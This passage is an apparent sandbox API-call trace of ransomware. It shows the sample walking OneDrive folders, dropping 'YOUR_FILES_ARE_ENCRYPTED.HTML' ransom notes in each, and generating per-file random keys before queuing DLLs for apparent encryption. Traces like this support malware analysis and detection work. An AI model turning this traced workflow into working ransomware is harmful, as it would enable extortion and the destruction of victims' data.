lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\*" [0162.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.407] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.407] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.407] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.407] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.407] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.407] lstrlenW (lpString=".mui") returned 4 [0162.407] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.407] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.407] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.407] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.408] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.411] CloseHandle (hObject=0x5b8) returned 1 [0162.411] GetProcessHeap () returned 0x270000 [0162.412] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sl", cAlternateFileName="")) returned 1 [0162.412] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl") returned 74 [0162.412] GetProcessHeap () returned 0x270000 [0162.412] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.412] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl" [0162.413] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\*" [0162.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.413] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.413] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.413] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.413] lstrlenW (lpString=".mui") returned 4 [0162.413] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.413] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.414] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.414] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.417] CloseHandle (hObject=0x5b8) returned 1 [0162.417] GetProcessHeap () returned 0x270000 [0162.418] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.418] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sq", cAlternateFileName="")) returned 1 [0162.418] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq") returned 74 [0162.418] GetProcessHeap () returned 0x270000 [0162.418] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.418] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq" [0162.418] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\*" [0162.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.419] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.419] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.419] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.419] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.419] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.419] lstrlenW (lpString=".mui") returned 4 [0162.419] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.419] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.419] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.419] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sq\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.420] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.422] CloseHandle (hObject=0x5b8) returned 1 [0162.423] GetProcessHeap () returned 0x270000 [0162.423] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.423] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa496d0d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa496d0d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa496d0d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2ff40, dwReserved0=0x0, dwReserved1=0x60, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0162.424] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll") returned 82 [0162.424] lstrcmpW (lpString1="sqmapi.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.424] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0162.424] lstrlenW (lpString=".dll") returned 4 [0162.424] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0162.424] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sqmapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0162.424] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=196416) returned 1 [0162.424] GetProcessHeap () returned 0x270000 [0162.424] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.425] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C4") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="53") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="B1") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C8") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F7") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="03") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="01") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="9B") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="82") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="01") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="9A") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="77") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="EE") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="70") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="E4") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="E2") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="3C") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="57") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="65") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C2") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="AF") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="69") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="6B") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="04") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F6") returned 2 [0162.428] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="E1") returned 2 [0162.428] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="29") returned 2 [0162.428] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="64") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="EB") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="F7") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="A8") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="1D") returned 2 [0162.429] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll" [0162.429] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.430] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.431] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4a51910, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4a51910, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4a51910, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x98a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="SqmWrapper.dll", cAlternateFileName="SQMWRA~1.DLL")) returned 1 [0162.431] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll") returned 86 [0162.431] lstrcmpW (lpString1="SqmWrapper.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.431] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0162.431] lstrlenW (lpString=".dll") returned 4 [0162.431] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0162.431] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sqmwrapper.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0162.432] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=39080) returned 1 [0162.432] GetProcessHeap () returned 0x270000 [0162.432] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0162.437] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C1") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="47") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="FF") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="3E") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="37") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="4A") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="A3") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="2F") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="5B") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="6B") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="7D") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="17") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F3") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="AC") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="FB") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="68") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="1D") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="73") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="BB") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="1E") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="12") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="9B") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="02") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="E2") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: 